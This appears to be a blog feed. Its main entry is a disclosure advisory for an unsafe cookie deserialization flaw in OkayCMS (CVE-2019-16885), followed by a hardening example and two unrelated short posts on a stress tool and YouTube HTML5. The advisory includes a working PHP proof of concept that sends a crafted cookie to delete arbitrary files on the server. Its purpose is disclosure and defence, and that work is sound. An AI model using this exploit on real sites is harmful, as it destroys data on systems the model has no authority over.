Web https://tech.feedyourhead.at/ en OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span>
<div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">
<p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p>
<h4>Summary</h4>
<p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content management system for an online store.</a></p>
<h4>Vulnerability Description</h4>
<p>An unauthenticated attacker can upload a webshell by injecting a malicious PHP object via a crafted cookie. This can happen in two places: in “<em>view/ProductsView.php</em>” via the cookie "price_filter", and in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies pass untrusted values straight to unserialize(). The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p>
<div class="geshifilter"><pre class="php geshifilter-php">$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();</pre></div>
<p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p>
<div class="geshifilter"><pre class="php geshifilter-php">$price_filter = unserialize($_COOKIE['price_filter']);</pre></div>
<h4>Proof of Concept</h4>
<p>The following code uses an object of the Smarty component to delete arbitrary files on the web host:</p>
<div class="geshifilter"><pre class="php geshifilter-php">&lt;?php

if($argc != 3) {
    print "usage: $argv[0] &lt;url&gt; &lt;file&gt;\n";
    exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
        $cached-&gt;is_locked = false;
        @unlink($cached-&gt;lock_id);
    }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
        $this-&gt;lock_id = $GLOBALS['file'];
        $this-&gt;handler = new Smarty_Internal_CacheResource_File;
    }
}

class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this-&gt;smarty = new Smarty;
        $this-&gt;cached = new Smarty_Template_Cached;
    }

    public function __destruct(){
        if ($this-&gt;smarty-&gt;cache_locking &amp;&amp; isset($this-&gt;cached) &amp;&amp; $this-&gt;cached-&gt;is_locked) {
            $this-&gt;cached-&gt;handler-&gt;releaseLock($this-&gt;smarty, $this-&gt;cached);
        }
    }
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
    'Accept-Language: en-US,en;q=0.5',
    "Referer: $url/en/catalog/myagkie-igrushki",
    'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER =&gt; $headers,
    CURLOPT_RETURNTRANSFER =&gt; true,
    CURLOPT_URL =&gt; "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT =&gt; 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
    print curl_error($curl);
}
curl_close($curl);

print $resp;

?&gt;</pre></div>
<h4>Notes</h4>
<p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p>
<h4>Vulnerable Versions</h4>
<p>All versions of the “Lite” branch including 2.3.4. Pro versions prior to 3.0.2 might have been affected too.</p>
<h4>Tested Versions</h4>
<p>OkayCMS-Lite 2.3.4</p>
<h4>Impact</h4>
<p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p>
<h4>Mitigation</h4>
<p>At the time of this publication the vendor has only patched the paid version of the CMS, so switching to other free software or upgrading to the Pro version of OkayCMS is recommended.</p>
<h4>Vendor Contact Timeline</h4>
<p>2019-08-29: Contacting the vendor</p>
<p>2019-09-04: Vendor replied</p>
<p>2019-09-17: Vendor released commercial version 3.0.2 including a bugfix</p>
<p>2019-09-29: Public disclosure</p>
<h4>Advisory URL</h4>
<p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p>
</div>
<span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span>
<div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div>
<section class="field field--name-comment field--type-comment field--label-above comment-wrapper">
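<p>Hardening the two cookie reads quoted in the advisory, as an added example that is neither OkayCMS code nor part of the advisory: the same reads with object instantiation disabled via <code>allowed_classes =&gt; false</code>, plus a JSON variant for code that can change the cookie format. The function names <code>readCookieArray</code> and <code>readCookieJson</code> and the sample cookie values are assumptions.</p>

```php
<?php
// Added example, not OkayCMS code: the cookie reads from the advisory
// hardened so that a serialized object in the cookie is never instantiated.
// Function names and sample values are assumptions made for this example.

// Vulnerable pattern quoted in the advisory:
//   $items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
//   $price_filter = unserialize($_COOKIE['price_filter']);
// unserialize() on attacker-controlled input creates objects of any loaded
// class and runs their __wakeup()/__destruct() methods; that is the behaviour
// the PoC above relies on.

/**
 * Read a cookie that must hold a flat array of scalars (e.g. product ids).
 * allowed_classes => false (PHP >= 7.0) turns every object in the payload
 * into __PHP_Incomplete_Class, and the shape check below then rejects it.
 */
function readCookieArray(string $name, array $cookies): array
{
    if (!isset($cookies[$name]) || !is_string($cookies[$name])) {
        return [];
    }
    $data = @unserialize($cookies[$name], ['allowed_classes' => false]);
    if (!is_array($data)) {
        return [];                 // malformed input, or an object at top level
    }
    foreach ($data as $value) {
        if (!is_scalar($value) && $value !== null) {
            return [];             // nested object or array: reject the whole value
        }
    }
    return $data;
}

/**
 * Preferable where the cookie format can be changed: store JSON instead of
 * PHP-serialized data. json_decode() has no way to instantiate classes.
 */
function readCookieJson(string $name, array $cookies): array
{
    if (!isset($cookies[$name]) || !is_string($cookies[$name])) {
        return [];
    }
    $data = json_decode($cookies[$name], true, 2);   // depth 2: flat array only
    return is_array($data) ? $data : [];
}

// Constructed sample cookies: legitimate values and one carrying an object.
$cookies = [
    'comparison'   => serialize([12, 34]),
    'price_filter' => serialize(['min' => 10, 'max' => 200]),
    'json_filter'  => json_encode(['min' => 10, 'max' => 200]),
    'hostile'      => 'O:8:"stdClass":0:{}',
];

var_dump(readCookieArray('comparison', $cookies));    // legitimate list, accepted
var_dump(readCookieArray('price_filter', $cookies));  // legitimate filter, accepted
var_dump(readCookieArray('hostile', $cookies));       // object payload, rejected
var_dump(readCookieJson('json_filter', $cookies));    // JSON filter, accepted
var_dump(readCookieJson('price_filter', $cookies));   // PHP-serialized, not JSON: rejected
```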
</section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at
Simple WebApp-Stress-Tool https://tech.feedyourhead.at/content/simulty <span class="field field--name-title field--type-string field--label-hidden">Simple WebApp-Stress-Tool</span>
<div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I wrote <a href="https://github.com/whotwagner/simulty">Simulty</a>, a very simple webapp stress tool. It reads random URLs from a file and sends multiple GET requests to them simultaneously.</p>
<h2>Download:</h2>
<pre><code>git clone https://github.com/whotwagner/simulty</code></pre>
<h2>Usage:</h2>
<p>Create a file with one URL per line and start the stress test with:</p>
<pre><code>./simulty.rb &lt;urlfile&gt; &lt;number-of-threads&gt;</code></pre>
<h2>Sample-Urlfile:</h2>
<pre><code>http://www.somefoobar.com/index.php?fun
https://www.somefoobar.com/user/login.php
http://www.somefoobar.com/whatever/somewhere/over/the/rainbow.php</code></pre>
<p>Tip: such a URL file can be generated from a web server log file.</p> </div>
<span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 22 2016</span>
<div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/network" hreflang="en">Network</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/97" hreflang="en">Toscom</a></div> </div> </div>
Fri, 22 Apr 2016 10:25:55 +0000 Hoti 177 at https://tech.feedyourhead.at
Youtube with HTML5 https://tech.feedyourhead.at/content/youtube-html5 <span class="field field--name-title field--type-string field--label-hidden">Youtube with HTML5</span>
<div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><a href="http://www.youtube.com/html5">YouTube now works with HTML5</a></p> </div>
<span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Feb 20 2015</span>
<div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/youtube" hreflang="en">Youtube</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div>
Thu, 19 Feb 2015 23:08:40 +0000 Hoti 55 at https://tech.feedyourhead.at